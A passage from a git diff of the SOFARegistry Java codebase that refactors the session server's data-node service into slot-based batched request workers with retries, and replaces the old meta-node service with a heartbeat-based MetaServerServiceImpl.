com.alipay.sofa.registry.common.model.dataserver.*; +import com.alipay.sofa.registry.common.model.slot.Slot; +import com.alipay.sofa.registry.common.model.slot.SlotAccessGenericResponse; import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.SubDatum; import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.common.model.store.UnPublisher; import com.alipay.sofa.registry.log.Logger; import com.alipay.sofa.registry.log.LoggerFactory; import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; @@ -35,435 +32,387 @@ import com.alipay.sofa.registry.remoting.exchange.message.Request; import com.alipay.sofa.registry.remoting.exchange.message.Response; import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.NodeManager; -import com.alipay.sofa.registry.server.session.node.SessionProcessIdGenerator; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer; -import com.alipay.sofa.registry.timer.AsyncHashedWheelTimer.TaskFailedCallback; -import com.google.common.util.concurrent.ThreadFactoryBuilder; -import org.springframework.beans.factory.annotation.Autowired; - -import java.util.Collection; -import java.util.HashMap; -import java.util.List; -import java.util.Map; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.util.DatumUtils; +import com.alipay.sofa.registry.task.BlockingQueues; +import com.alipay.sofa.registry.task.FastRejectedExecutionException; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import java.util.*; +import java.util.concurrent.BlockingQueue; import java.util.concurrent.TimeUnit; -import java.util.concurrent.atomic.AtomicInteger; +import javax.annotation.PostConstruct; +import org.apache.commons.lang.StringUtils; +import org.springframework.beans.factory.annotation.Autowired; /** - * * @author shangyu.wh * @version $Id: DataNode.java, v 0.1 2017-12-01 11:30 shangyu.wh Exp $ */ public class DataNodeServiceImpl implements DataNodeService { - private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeServiceImpl.class); + private static final Logger LOGGER = LoggerFactory.getLogger(DataNodeServiceImpl.class); - @Autowired - private NodeExchanger dataNodeExchanger; + @Autowired private NodeExchanger dataNodeExchanger; - @Autowired - private NodeManager dataNodeManager; + @Autowired private SlotTableCache slotTableCache; - @Autowired - private SessionServerConfig sessionServerConfig; + @Autowired private SessionServerConfig sessionServerConfig; - private AsyncHashedWheelTimer asyncHashedWheelTimer; + private Worker[] workers; + private BlockingQueues blockingQueues; - public DataNodeServiceImpl() { - ThreadFactoryBuilder threadFactoryBuilder = new ThreadFactoryBuilder(); - threadFactoryBuilder.setDaemon(true); - asyncHashedWheelTimer = new AsyncHashedWheelTimer(threadFactoryBuilder.setNameFormat( - "Registry-DataNodeServiceImpl-WheelTimer").build(), 100, TimeUnit.MILLISECONDS, 1024, - threadFactoryBuilder.setNameFormat("Registry-DataNodeServiceImpl-WheelExecutor-%d") - .build(), new TaskFailedCallback() { - @Override - public void executionRejected(Throwable e) { - LOGGER.error("executionRejected: " + e.getMessage(), e); - } - - @Override - public void executionFailed(Throwable e) { - LOGGER.error("executionFailed: " + e.getMessage(), e); - } - }); + @PostConstruct + public void init() { + this.workers = new Worker[sessionServerConfig.getDataNodeExecutorWorkerSize()]; + blockingQueues = + new BlockingQueues<>( + sessionServerConfig.getDataNodeExecutorWorkerSize(), + sessionServerConfig.getDataNodeExecutorQueueSize(), + false); + for (int i = 0; i < workers.length; i++) { + workers[i] = new Worker(blockingQueues.getQueue(i)); + ConcurrentUtils.createDaemonThread("req-data-worker-" + i, workers[i]).start(); } - - @Override - public void register(final Publisher publisher) { - - try { - - Request publisherRequest = new Request() { - - private URL url; - - @Override - public PublishDataRequest getRequestBody() { - PublishDataRequest publishDataRequest = new PublishDataRequest(); - publishDataRequest.setPublisher(publisher); - publishDataRequest.setSessionServerProcessId(SessionProcessIdGenerator - .getSessionProcessId()); - return publishDataRequest; - } - - @Override - public URL getRequestUrl() { - if (url == null) { - url = getUrl(publisher.getDataInfoId()); - } - return url; - } - }; - - Response response = dataNodeExchanger.request(publisherRequest); - - Object result = response.getResult(); - if (result instanceof CommonResponse) { - CommonResponse commonResponse = (CommonResponse) result; - if (!commonResponse.isSuccess()) { - LOGGER.error( - "PublishDataRequest get server response failed!target url:{},message:{}", - publisherRequest.getRequestUrl(), commonResponse.getMessage()); - throw new RuntimeException( - "PublishDataRequest get server response failed! msg:" - + commonResponse.getMessage()); - } - } - } catch (RequestException e) { - LOGGER.error("DataNodeService register new publisher error! " + e.getRequestMessage(), - e); - throw new RuntimeException("DataNodeService register new publisher error! " - + e.getRequestMessage(), e); - } + } + + private void commitReq(int slotId, Req req) { + int idx = slotId % blockingQueues.queueNum(); + try { + blockingQueues.put(idx, req); + } catch (FastRejectedExecutionException e) { + throw new FastRejectedExecutionException( + String.format("commit req overflow, slotId=%d, %s", slotId, e.getMessage())); } - - @Override - public void unregister(final Publisher publisher) { - try { - Request unPublishRequest = new Request() { - - private URL url; - - @Override - public UnPublishDataRequest getRequestBody() { - UnPublishDataRequest unPublishDataRequest = new UnPublishDataRequest(); - unPublishDataRequest.setDataInfoId(publisher.getDataInfoId()); - unPublishDataRequest.setRegisterId(publisher.getRegisterId()); - unPublishDataRequest.setRegisterTimestamp(publisher.getRegisterTimestamp()); - return unPublishDataRequest; - } - - @Override - public URL getRequestUrl() { - if (url == null) { - url = getUrl(publisher.getDataInfoId()); - } - return url; - } - }; - - Response response = dataNodeExchanger.request(unPublishRequest); - - Object result = response.getResult(); - if (result instanceof CommonResponse) { - CommonResponse commonResponse = (CommonResponse) result; - if (!commonResponse.isSuccess()) { - LOGGER.error( - "UnPublishRequest get server response failed!target url:{},message:{}", - unPublishRequest.getRequestUrl(), commonResponse.getMessage()); - throw new RuntimeException("UnPublishRequest get server response failed! msg:" - + commonResponse.getMessage()); - } + } + + @Override + public void register(final Publisher publisher) { + final int slotId = slotTableCache.slotOf(publisher.getDataInfoId()); + commitReq(slotId, new Req(slotId, publisher)); + } + + @Override + public void unregister(final Publisher publisher) { + final int slotId = slotTableCache.slotOf(publisher.getDataInfoId()); + UnPublisher unPublisher = UnPublisher.of(publisher); + commitReq(slotId, new Req(slotId, unPublisher)); + } + + @Override + public void clientOff(ClientOffPublishers clientOffPublishers) { + if (clientOffPublishers.isEmpty()) { + return; + } + Map groups = groupBySlot(clientOffPublishers); + for (Map.Entry group : groups.entrySet()) { + final int slotId = group.getKey(); + final ClientOffPublisher clientOff = group.getValue(); + commitReq(slotId, new Req(slotId, clientOff)); + } + } + + @Override + public Map fetchDataVersion( + String dataCenter, int slotId, Map interests) { + String dataNodeIp = null; + try { + final Slot slot = getSlot(slotId); + dataNodeIp = slot.getLeader(); + final GetDataVersionRequest request = + new GetDataVersionRequest(dataCenter, ServerEnv.PROCESS_ID, slotId, interests); + request.setSlotTableEpoch(slotTableCache.getEpoch()); + request.setSlotLeaderEpoch(slot.getLeaderEpoch()); + Request getDataVersionRequestRequest = + new Request() { + @Override + public GetDataVersionRequest getRequestBody() { + return request; } - } catch (RequestException e) { - LOGGER.error("Unregister publisher to data node error! " + e.getRequestMessage(), e); - throw new RuntimeException("Unregister publisher to data node error! " - + e.getRequestMessage(), e); - } - + @Override + public URL getRequestUrl() { + return getUrl(slot); + } + }; + + Response response = dataNodeExchanger.request(getDataVersionRequestRequest); + Object result = response.getResult(); + SlotAccessGenericResponse> genericResponse = + (SlotAccessGenericResponse>) result; + if (genericResponse.isSuccess()) { + Map map = genericResponse.getData(); + return DatumUtils.intern(map); + } else { + throw new RuntimeException( + StringFormatter.format( + "GetDataVersion got fail response {}, {}, slotId={}, access={}, msg:{}", + dataNodeIp, + dataCenter, + slotId, + genericResponse.getSlotAccess(), + genericResponse.getMessage())); + } + } catch (RequestException e) { + throw new RuntimeException( + StringFormatter.format( + "GetDataVersion fail {}, slotId={}", dataNodeIp, dataCenter, slotId, e)); } + } + + @Override + public SubDatum fetch(String dataInfoId, String dataCenter) { + String dataNodeIp = null; + int slotId = -1; + try { + final Slot slot = getSlot(dataInfoId); + dataNodeIp = slot.getLeader(); + slotId = slot.getId(); + GetDataRequest getDataRequest = + new GetDataRequest(ServerEnv.PROCESS_ID, dataInfoId, dataCenter, slot.getId()); + getDataRequest.setSlotTableEpoch(slotTableCache.getEpoch()); + getDataRequest.setSlotLeaderEpoch(slot.getLeaderEpoch()); + Request getDataRequestStringRequest = + new Request() { + + @Override + public GetDataRequest getRequestBody() { + return getDataRequest; + } - @Override - public void clientOff(List connectIds) { - if (connectIds == null || connectIds.isEmpty()) { - return; - } - //get all local dataCenter data node - Collection nodes = dataNodeManager.getDataCenterNodes(); - if (nodes != null && nodes.size() > 0) { - - for (Node node : nodes) { - Request clientOffRequestRequest = new Request() { - - private AtomicInteger retryTimes = new AtomicInteger(); - - @Override - public ClientOffRequest getRequestBody() { - ClientOffRequest clientOffRequest = new ClientOffRequest(); - clientOffRequest.setHosts(connectIds); - clientOffRequest.setGmtOccur(System.currentTimeMillis()); - return clientOffRequest; - } - - @Override - public URL getRequestUrl() { - return new URL(node.getNodeUrl().getIpAddress(), - sessionServerConfig.getDataServerPort()); - } - - @Override - public AtomicInteger getRetryTimes() { - return retryTimes; - } - }; - try { - - Response response = dataNodeExchanger.request(clientOffRequestRequest); - Object result = response.getResult(); - if (result instanceof CommonResponse) { - CommonResponse commonResponse = (CommonResponse) result; - if (!commonResponse.isSuccess()) { - LOGGER - .error( - "ClientOff RequestRequest get response failed!target url:{},message:{}", - node.getNodeUrl(), commonResponse.getMessage()); - throw new RuntimeException( - "ClientOff RequestRequest get response failed! msg:" - + commonResponse.getMessage()); - } - } else { - LOGGER - .error( - "ClientOff Request has not get response or response type illegal!url:{}", - node.getNodeUrl()); - throw new RuntimeException( - "ClientOff Request has not get response or response type illegal!"); - } - } catch (Exception e) { - LOGGER.error("Client Off request error! ", e); - clientOffRetry(clientOffRequestRequest); - } + @Override + public URL getRequestUrl() { + return getUrl(slot); + } + @Override + public Integer getTimeout() { + return sessionServerConfig.getDataNodeExchangeForFetchDatumTimeoutMillis(); } - } + }; + + Response response = dataNodeExchanger.request(getDataRequestStringRequest); + Object result = response.getResult(); + SlotAccessGenericResponse genericResponse = + (SlotAccessGenericResponse) result; + if (genericResponse.isSuccess()) { + final SubDatum datum = genericResponse.getData(); + return SubDatum.intern(datum); + } else { + throw new RuntimeException( + StringFormatter.format( + "GetData got fail response {}, {}, {}, slotId={} msg:{}", + dataNodeIp, + dataInfoId, + dataCenter, + slotId, + genericResponse.getMessage())); + } + } catch (RequestException e) { + throw new RuntimeException( + StringFormatter.format( + "GetData fail {}, {}, {}, slotId={}", dataNodeIp, dataInfoId, dataCenter, slotId), + e); } - - private void clientOffRetry(Request clientOffRequestRequest) { - - URL url = clientOffRequestRequest.getRequestUrl(); - - int retryTimes = clientOffRequestRequest.getRetryTimes().incrementAndGet(); - - if (retryTimes <= sessionServerConfig.getCancelDataTaskRetryTimes()) { - asyncHashedWheelTimer.newTimeout(timeout -> { - try { - Response response = dataNodeExchanger.request(clientOffRequestRequest); - Object result = response.getResult(); - if (result instanceof CommonResponse) { - CommonResponse commonResponse = (CommonResponse) result; - if (!commonResponse.isSuccess()) { - LOGGER.error( - "ClientOff retry RequestRequest get response failed!retryTimes={},target url:{},message:{}", - retryTimes, - url, commonResponse.getMessage()); - throw new RuntimeException( - "ClientOff retry RequestRequest get response failed! msg:" + - commonResponse.getMessage()); - } - } else { - LOGGER.error( - "ClientOff retry Request has not get response or response type illegal!retryTimes={},url:{}", - retryTimes, url); - throw new RuntimeException( - "ClientOff retry Request has not get response or response type illegal!"); - } - } catch (Exception e) { - clientOffRetry(clientOffRequestRequest); - } - }, getBlockTime(retryTimes), TimeUnit.MILLISECONDS); - } else { - LOGGER.error("ClientOff retryTimes have exceeded! stop retry! retryTimes={}, url={}, request={}", - retryTimes, url, clientOffRequestRequest.getRequestBody()); - } + } + + private CommonResponse sendRequest(Request request) throws RequestException { + Response response = dataNodeExchanger.request(request); + Object result = response.getResult(); + SlotAccessGenericResponse resp = (SlotAccessGenericResponse) result; + if (!resp.isSuccess()) { + throw new RuntimeException( + String.format( + "response failed, target: %s, request: %s, message: %s", + request.getRequestUrl(), request.getRequestBody(), resp.getMessage())); } - - private long getBlockTime(int retry) { - long initialSleepTime = TimeUnit.MILLISECONDS.toMillis(sessionServerConfig - .getCancelDataTaskRetryFirstDelay()); - long increment = TimeUnit.MILLISECONDS.toMillis(sessionServerConfig - .getCancelDataTaskRetryIncrementDelay()); - long result = initialSleepTime + (increment * (retry - 1)); - return result >= 0L ? result : 0L; + return resp; + } + + private Slot getSlot(String dataInfoId) { + final int slotId = slotTableCache.slotOf(dataInfoId); + Slot slot = slotTableCache.getSlot(slotId); + if (slot == null) { + throw new RequestException( + StringFormatter.format("slot not found for {}, slotId={}", dataInfoId, slotId)); } + return slot; + } - @Override - public void registerSessionProcessId(final SessionServerRegisterRequest sessionServerRegisterRequest, - final URL dataUrl) { + private Slot getSlot(int slotId) { + Slot slot = slotTableCache.getSlot(slotId); + if (slot == null) { + throw new RequestException(StringFormatter.format("slot not found, slotId={}", slotId)); + } + return slot; + } - try { + private URL getUrl(Slot slot) { + final String dataIp = slot.getLeader(); + if (StringUtils.isBlank(dataIp)) { + throw new RequestException(String.format("slot has no leader, slotId=%s", slot)); + } + return new URL(dataIp, sessionServerConfig.getDataServerPort()); + } + + private Map groupBySlot(ClientOffPublishers clientOffPublishers) { + List publishers = clientOffPublishers.getPublishers(); + Map ret = Maps.newHashMap(); + for (Publisher publisher : publishers) { + final String dataInfoId = publisher.getDataInfoId(); + int slotId = slotTableCache.slotOf(dataInfoId); + ClientOffPublisher request = + ret.computeIfAbsent( + slotId, k -> new ClientOffPublisher(clientOffPublishers.getConnectId())); + request.addPublisher(publisher); + } + return ret; + } - Request request = new Request() { + private static final class Req { + final int slotId; + final Object req; - @Override - public SessionServerRegisterRequest getRequestBody() { - return sessionServerRegisterRequest; - } + Req(int slotId, Object req) { + this.slotId = slotId; + this.req = req; + } + } - @Override - public URL getRequestUrl() { - return dataUrl; - } - }; + private static final class RetryBatch { + final BatchRequest batch; + long expireTimestamp; + int retryCount; - dataNodeExchanger.request(request); - } catch (RequestException e) { - LOGGER.error("DataNodeService register processId error! " + e.getRequestMessage(), e); - throw new RuntimeException("DataNodeService register processId error! " - + e.getRequestMessage(), e); - } + RetryBatch(BatchRequest batch) { + this.batch = batch; } @Override - public Map> fetchDataVersion(URL dataNodeUrl, - Collection dataInfoIdList) { - - Map> map = new HashMap<>(); - try { - - Request getDataVersionRequestRequest = new Request() { - @Override - public GetDataVersionRequest getRequestBody() { - GetDataVersionRequest getDataVersionRequest = new GetDataVersionRequest(); - getDataVersionRequest.setDataInfoIds((List) dataInfoIdList); - return getDataVersionRequest; - } - - @Override - public URL getRequestUrl() { - return dataNodeUrl; - } - }; - - Response response = dataNodeExchanger.request(getDataVersionRequestRequest); - - Object result = response.getResult(); - if (result instanceof GenericResponse) { - GenericResponse genericResponse = (GenericResponse) result; - if (genericResponse.isSuccess()) { - map = (Map>) genericResponse.getData(); - if (map.isEmpty()) { - LOGGER - .warn( - "GetDataVersionRequestRequest get response contains no data!target data Node url:{} about dataInfoIds size:{}", - dataNodeUrl.getAddressString(), dataInfoIdList.size()); - } - } else { - LOGGER.error("fetchDataVersion has not get fail response!msg:{}", - genericResponse.getMessage()); - throw new RuntimeException("fetchDataVersion has not get fail response! msg:" - + genericResponse.getMessage()); - } - } else { - LOGGER - .error("GetDataVersionRequestRequest has not get response or response type illegal!"); - } + public String toString() { + return "RetryBatch{" + + "batch=" + + batch + + ", retry=" + + retryCount + + ", expire=" + + expireTimestamp + + '}'; + } + } - } catch (RequestException e) { - LOGGER.error("Fetch data Version request error! " + e.getRequestMessage(), e); - throw new RuntimeException( - "Fetch data Version request error! " + e.getRequestMessage(), e); - } + private final class Worker implements Runnable { + final BlockingQueue queue; + final LinkedList retryBatches = Lists.newLinkedList(); - return map; + Worker(BlockingQueue queue) { + this.queue = queue; } @Override - public Datum fetchDataCenter(String dataInfoId, String dataCenterId) { - - Map map = getDatumMap(dataInfoId, dataCenterId); - if (map != null && map.size() > 0) { - return map.get(dataCenterId); + public void run() { + for (; ; ) { + try { + final Req firstReq = queue.poll(200, TimeUnit.MILLISECONDS); + if (firstReq != null) { + // TODO config max + Map> reqs = + drainReq(queue, sessionServerConfig.getDataNodeMaxBatchSize()); + // send by order, firstReq.slotId is the first one + LinkedList firstBatch = reqs.remove(firstReq.slotId); + if (firstBatch == null) { + firstBatch = Lists.newLinkedList(); + } + firstBatch.addFirst(firstReq.req); + request(firstReq.slotId, firstBatch); + for (Map.Entry> batch : reqs.entrySet()) { + request(batch.getKey(), batch.getValue()); + } + } + // check the retry + if (!retryBatches.isEmpty()) { + final Iterator it = retryBatches.iterator(); + List retries = Lists.newArrayList(); + while (it.hasNext()) { + RetryBatch batch = it.next(); + it.remove(); + if (!DataNodeServiceImpl.this.request(batch.batch)) { + retries.add(batch); + } + } + for (RetryBatch retry : retries) { + retry(retry); + } + } + } catch (Throwable e) { + LOGGER.error("failed to request batch", e); } - return null; + } } - @Override - public Map fetchGlobal(String dataInfoId) { - //get all dataCenter data - return getDatumMap(dataInfoId); + private boolean retry(RetryBatch retry) { + retry.retryCount++; + if (retry.retryCount <= sessionServerConfig.getDataNodeRetryTimes()) { + if (retryBatches.size() >= sessionServerConfig.getDataNodeRetryQueueSize()) { + // remove the oldest + retryBatches.removeFirst(); + } + retry.expireTimestamp = + System.currentTimeMillis() + sessionServerConfig.getDataNodeRetryBackoffMillis(); + retryBatches.add(retry); + return true; + } + return false; } - private Map getDatumMap(String dataInfoId) { - return getDatumMap(dataInfoId, null); + private boolean request(int slotId, List reqs) { + final BatchRequest batch = new BatchRequest(ServerEnv.PROCESS_ID, slotId, reqs); + if (!DataNodeServiceImpl.this.request(batch)) { + retry(new RetryBatch(batch)); + return false; + } + return true; } - - @Override public Map getDatumMap(String dataInfoId, String dataCenterId) { - - Map map; - - try { - - GetDataRequest getDataRequest = new GetDataRequest(); - - //dataCenter null means all dataCenters - if (dataCenterId != null) { - getDataRequest.setDataCenter(dataCenterId); + } + + private boolean request(BatchRequest batch) { + try { + final Slot slot = getSlot(batch.getSlotId()); + batch.setSlotTableEpoch(slotTableCache.getEpoch()); + batch.setSlotLeaderEpoch(slot.getLeaderEpoch()); + sendRequest( + new Request() { + @Override + public Object getRequestBody() { + return batch; } - getDataRequest.setDataInfoId(dataInfoId); - - Request getDataRequestStringRequest = new Request() { - - @Override - public GetDataRequest getRequestBody() { - return getDataRequest; - } - - @Override - public URL getRequestUrl() { - return getUrl(dataInfoId); - } - }; - - Response response = dataNodeExchanger.request(getDataRequestStringRequest); - Object result = response.getResult(); - if (result instanceof GenericResponse) { - GenericResponse genericResponse = (GenericResponse) result; - if (genericResponse.isSuccess()) { - map = (Map) genericResponse.getData(); - if (map == null || map.isEmpty()) { - LOGGER.warn("GetDataRequest get response contains no datum!"); - } else { - map.forEach((dataCenter, datum) -> Datum.processDatum(datum)); - } - } else { - LOGGER.error("GetDataRequest has not get fail response!msg:{}", genericResponse.getMessage()); - throw new RuntimeException("GetDataRequest has not get fail response! msg:" + - genericResponse.getMessage()); - } - } else { - LOGGER.error("GetDataRequest has not get response or response type illegal!"); - throw new RuntimeException("GetDataRequest has not get response or response type illegal!"); + @Override + public URL getRequestUrl() { + return getUrl(slot); } - } catch (RequestException e) { - LOGGER.error("Get data request to data node error! " + e.getRequestMessage(), e); - throw new RuntimeException( - "Get data request to data node error! " + e.getRequestMessage(), e); - } - - return map; + }); + return true; + } catch (Throwable e) { + LOGGER.error("failed to request batch, {}", batch, e); + return false; } + } - private URL getUrl(String dataInfoId) { - - Node dataNode = dataNodeManager.getNode(dataInfoId); - if (dataNode != null) { - //meta push data node has not port - String dataIp = dataNode.getNodeUrl().getIpAddress(); - return new URL(dataIp, sessionServerConfig.getDataServerPort()); - } - return null; + private Map> drainReq(BlockingQueue queue, int max) { + List reqs = new ArrayList<>(max); + queue.drainTo(reqs, max); + if (reqs.isEmpty()) { + return Collections.emptyMap(); } - -} \ No newline at end of file + Map> ret = Maps.newLinkedHashMap(); + for (Req req : reqs) { + LinkedList objects = ret.computeIfAbsent(req.slotId, k -> Lists.newLinkedList()); + objects.add(req.req); + } + return ret; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaNodeService.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaNodeService.java deleted file mode 100644 index e0a478ed5..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaNodeService.java +++ /dev/null @@ -1,34 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node.service; - -import com.alipay.sofa.registry.common.model.metaserver.ProvideData; - -/** - * - * @author shangyu.wh - * @version $Id: MetaNodeService.java, v 0.1 2018-04-17 19:57 shangyu.wh Exp $ - */ -public interface MetaNodeService { - - /** - * fetch persistence data from meta server - * @param dataInfoId - * @return - */ - ProvideData fetchData(String dataInfoId); -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaNodeServiceImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaNodeServiceImpl.java deleted file mode 100644 index 85eef1f9a..000000000 --- a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaNodeServiceImpl.java +++ /dev/null @@ -1,85 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.session.node.service; - -import com.alipay.sofa.registry.common.model.metaserver.FetchProvideDataRequest; -import com.alipay.sofa.registry.common.model.metaserver.ProvideData; -import com.alipay.sofa.registry.common.model.store.URL; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.remoting.exchange.NodeExchanger; -import com.alipay.sofa.registry.remoting.exchange.RequestException; -import com.alipay.sofa.registry.remoting.exchange.message.Request; -import com.alipay.sofa.registry.remoting.exchange.message.Response; -import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; -import com.alipay.sofa.registry.server.session.node.RaftClientManager; -import com.alipay.sofa.registry.server.session.node.SessionNodeManager; -import org.springframework.beans.factory.annotation.Autowired; - -/** - * - * @author shangyu.wh - * @version $Id: MetaNodeServiceImpl.java, v 0.1 2018-04-17 21:23 shangyu.wh Exp $ - */ -public class MetaNodeServiceImpl implements MetaNodeService { - - private static final Logger LOGGER = LoggerFactory.getLogger(SessionNodeManager.class, - "[MetaNodeService]"); - - @Autowired - protected SessionServerConfig sessionServerConfig; - - @Autowired - protected NodeExchanger metaNodeExchanger; - - @Autowired - RaftClientManager raftClientManager; - - @Override - public ProvideData fetchData(String dataInfoId) { - try { - - Request request = new Request() { - - @Override - public FetchProvideDataRequest getRequestBody() { - - return new FetchProvideDataRequest(dataInfoId); - } - - @Override - public URL getRequestUrl() { - return new URL(raftClientManager.getLeader().getIp(), - sessionServerConfig.getMetaServerPort()); - } - }; - - Response response = metaNodeExchanger.request(request); - - Object result = response.getResult(); - if (result instanceof ProvideData) { - return (ProvideData) result; - } else { - LOGGER.error("fetch null provider data!"); - throw new RuntimeException("MetaNodeService fetch null provider data!"); - } - } catch (RequestException e) { - LOGGER.error("fetch provider data error! " + e.getRequestMessage(), e); - throw new RuntimeException("fetch provider data error! " + e.getRequestMessage(), e); - } - } -} \ No newline at end of file diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaServerServiceImpl.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaServerServiceImpl.java new file mode 100644 index 000000000..1bbe4cc4f --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/MetaServerServiceImpl.java @@ -0,0 +1,111 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.node.service; + +import com.alipay.sofa.registry.common.model.Node; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.BaseHeartBeatResponse; +import com.alipay.sofa.registry.common.model.metaserver.inter.heartbeat.HeartbeatRequest; +import com.alipay.sofa.registry.common.model.metaserver.nodes.SessionNode; +import com.alipay.sofa.registry.common.model.slot.SlotConfig; +import com.alipay.sofa.registry.common.model.slot.SlotTable; +import com.alipay.sofa.registry.common.model.store.URL; +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import com.alipay.sofa.registry.server.session.remoting.DataNodeExchanger; +import com.alipay.sofa.registry.server.session.remoting.DataNodeNotifyExchanger; +import com.alipay.sofa.registry.server.session.slot.SlotTableCache; +import com.alipay.sofa.registry.server.shared.env.ServerEnv; +import com.alipay.sofa.registry.server.shared.meta.AbstractMetaServerService; +import com.google.common.annotations.VisibleForTesting; +import java.util.Set; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author yuzhi.lyz + * @version v 0.1 2020-11-28 20:05 yuzhi.lyz Exp $ + */ +public class MetaServerServiceImpl extends AbstractMetaServerService { + + @Autowired private SessionServerConfig sessionServerConfig; + + @Autowired private SlotTableCache slotTableCache; + + @Autowired private DataNodeExchanger dataNodeExchanger; + + @Autowired private DataNodeNotifyExchanger dataNodeNotifyExchanger; + + @Override + protected long getCurrentSlotTableEpoch() { + return slotTableCache.getEpoch(); + } + + @Override + public int getRenewIntervalSecs() { + return sessionServerConfig.getSchedulerHeartbeatIntervalSecs(); + } + + @Override + protected void handleRenewResult(BaseHeartBeatResponse result) { + Set dataServerList = getDataServerList(); + if (dataServerList != null && !dataServerList.isEmpty()) { + dataNodeNotifyExchanger.setServerIps(dataServerList); + dataNodeNotifyExchanger.notifyConnectServerAsync(); + dataNodeExchanger.setServerIps(dataServerList); + dataNodeExchanger.notifyConnectServerAsync(); + } + if (result.getSlotTable() != null && result.getSlotTable() != SlotTable.INIT) { + slotTableCache.updateSlotTable(result.getSlotTable()); + } else { + LOGGER.warn("[handleRenewResult] no slot table result"); + } + } + + @Override + protected HeartbeatRequest createRequest() { + return new HeartbeatRequest( + createNode(), + slotTableCache.getEpoch(), + sessionServerConfig.getSessionServerDataCenter(), + System.currentTimeMillis(), + SlotConfig.slotBasicInfo()) + .setSlotTable(slotTableCache.getCurrentSlotTable()); + } + + private Node createNode() { + return new SessionNode( + new URL(ServerEnv.IP), sessionServerConfig.getSessionServerRegion(), ServerEnv.PROCESS_ID); + } + + @VisibleForTesting + void setSessionServerConfig(SessionServerConfig sessionServerConfig) { + this.sessionServerConfig = sessionServerConfig; + } + + @VisibleForTesting + void setSlotTableCache(SlotTableCache slotTableCache) { + this.slotTableCache = slotTableCache; + } + + @VisibleForTesting + void setDataNodeExchanger(DataNodeExchanger dataNodeExchanger) { + this.dataNodeExchanger = dataNodeExchanger; + } + + @VisibleForTesting + void setDataNodeNotifyExchanger(DataNodeNotifyExchanger dataNodeNotifyExchanger) { + this.dataNodeNotifyExchanger = dataNodeNotifyExchanger; + } +} diff --git a/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/SessionMetaServerManager.java b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/SessionMetaServerManager.java new file mode 100644 index 000000000..5c37cff0e --- /dev/null +++ b/server/server/session/src/main/java/com/alipay/sofa/registry/server/session/node/service/SessionMetaServerManager.java @@ -0,0 +1,52 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.session.node.service; + +import com.alipay.sofa.registry.server.session.bootstrap.SessionServerConfig; +import 